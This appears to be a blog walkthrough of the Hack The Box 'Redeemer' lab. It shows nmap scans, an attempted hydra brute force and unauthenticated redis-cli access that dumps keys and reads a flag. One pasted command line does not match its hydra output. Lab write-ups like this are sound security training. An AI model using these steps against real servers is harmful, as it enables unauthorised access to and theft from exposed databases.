HTB | Redeemer - Starting Point

https://app.hackthebox.com/machines/Redeemer/

Redeemer | Walkthrough

Phase
Reconnaissance
Foothold

Reconnaissance

Using nmap to enumerate all open ports in the target

nmap -sV 10.129.152.68

nopedawn@npdn ~/L/H/S/Redeemer> nmap -sV 10.129.152.68
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-11 06:33 WIB
Nmap scan report for 10.129.152.68
Host is up (1.1s latency).
Not shown: 998 closed ports
PORT      STATE    SERVICE         VERSION
44442/tcp filtered coldfusion-auth
51493/tcp filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 523.68 seconds

There are no port open for tcp, so I try this instead

sudo nmap -p- --min-rate 5000 -sS -Pn -n -v 10.129.152.68

nopedawn@npdn ~/L/H/S/Redeemer> sudo nmap -p- --min-rate 5000 -sS -Pn -n -v 10.129.152.68
[sudo] password for nopedawn:
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-11 06:52 WIB
Initiating SYN Stealth Scan at 06:52
Scanning 10.129.152.68 [65535 ports]
Increasing send delay for 10.129.152.68 from 0 to 5 due to 2162 out of 7206 dropped probes since last increase.
Increasing send delay for 10.129.152.68 from 5 to 10 due to 6390 out of 21299 dropped probes since last increase.
Increasing send delay for 10.129.152.68 from 10 to 20 due to max_successful_tryno increase to 4
Increasing send delay for 10.129.152.68 from 20 to 40 due to 4137 out of 13789 dropped probes since last increase.
Increasing send delay for 10.129.152.68 from 40 to 80 due to max_successful_tryno increase to 5
Increasing send delay for 10.129.152.68 from 80 to 160 due to 7303 out of 24341 dropped probes since last increase.
Discovered open port 6379/tcp on 10.129.152.68
Increasing send delay for 10.129.152.68 from 160 to 320 due to 11829 out of 39428 dropped probes since last increase.
Increasing send delay for 10.129.152.68 from 320 to 640 due to max_successful_tryno increase to 6
Increasing send delay for 10.129.152.68 from 640 to 1000 due to max_successful_tryno increase to 7
Completed SYN Stealth Scan at 06:52, 27.51s elapsed (65535 total ports)
Nmap scan report for 10.129.152.68
Host is up (0.30s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
6379/tcp open  redis

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.66 seconds
           Raw packets sent: 129485 (5.697MB) | Rcvd: 126660 (5.066MB)

Redis service is open in port 6379/tcp

I tried to enumerate using hydra, but it took a very long time

nopedawn@npdn ~/L/H/S/Redeemer> sudo nmap -p- --min-rate 5000 -sS -Pn -n -v 10.129.152.68
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-11 07:13:47
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task
[DATA] attacking rediss://10.129.152.68:6379/

Since this lab was in easy category, I changed my mind and decided to log in without using credentials. And it passed. (lol)

nopedawn@npdn ~/L/H/S/Redeemer> redis-cli -h 10.129.152.68
10.129.152.68:6379>

Foothold

Use INFO to check OS informations

nopedawn@npdn ~/L/H/S/Redeemer> redis-cli -h 10.129.152.68
10.129.152.68:6379> INFO
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:752
run_id:90a2c443a7a4a19cfc971436d381ec6dc314f668
tcp_port:6379
uptime_in_seconds:3010
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:9161524
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:6541312
used_memory_rss_human:6.24M
used_memory_peak:859624
used_memory_peak_human:839.48K
used_memory_peak_perc:100.00%
used_memory_overhead:847166
used_memory_startup:797248
used_memory_dataset:12458
used_memory_dataset_perc:19.97%
allocator_allocated:1562232
allocator_active:1937408
allocator_resident:13385728
total_system_memory:2084024320
total_system_memory_human:1.94G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.24
allocator_frag_bytes:375176
allocator_rss_ratio:6.91
allocator_rss_bytes:11448320
rss_overhead_ratio:0.49
rss_overhead_bytes:-6844416
mem_fragmentation_ratio:8.00
mem_fragmentation_bytes:5723696
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1770767095
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:421888
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:10
total_commands_processed:8
instantaneous_ops_per_sec:0
total_net_input_bytes:1370
total_net_output_bytes:29608
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:568
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:485696dbf489ae092e83cc959807878dacca140b
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:3.842992
used_cpu_user:3.449075
used_cpu_sys_children:0.002003
used_cpu_user_children:0.000000

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0
(0.51s)
10.129.152.68:6379>

That is In-memory Database type of Redis, and the version is 5.0.7

There are 4 keys present inside the database with index 0. And to obtain all the keys using following commands

$ redis-cli -h 10.129.152.68
10.129.152.68:6379> select
(error) ERR wrong number of arguments for 'select' command
(2.21s)
10.129.152.68:6379> select index
(error) ERR invalid DB index
(1.07s)
10.129.152.68:6379> KEYS *
1) "numb"
2) "flag"
3) "temp"
4) "stor"
(1.05s)
10.129.152.68:6379>

There is a flag, just open it and read the value

10.129.152.68:6379> KEYS *
1) "numb"
2) "flag"
3) "temp"
4) "stor"
(1.05s)
10.129.152.68:6379> KEYS pattern
(empty array)
(1.07s)
10.129.152.68:6379> KEYS "flag"
1) "flag"
(1.59s)
10.129.152.68:6379> KEYS *flag*
1) "flag"
(2.46s)
10.129.152.68:6379> type key
none
(1.17s)
10.129.152.68:6379> type flag
string
(1.15s)
10.129.152.68:6379> get key
(nil)
10.129.152.68:6379> get flag
"REDACTED"
(1.48s)
10.129.152.68:6379>

HTB | Appointment - Starting Point

HTB | Dancing - Starting Point

Posts

nopedawn

Title here

HTB | Redeemer - Starting Point

Redeemer | Walkthrough

Reconnaissance

Foothold

HTB | Redeemer - Starting Point

Redeemer | Walkthrough#

Reconnaissance#

Foothold#

Redeemer | Walkthrough

Reconnaissance

Foothold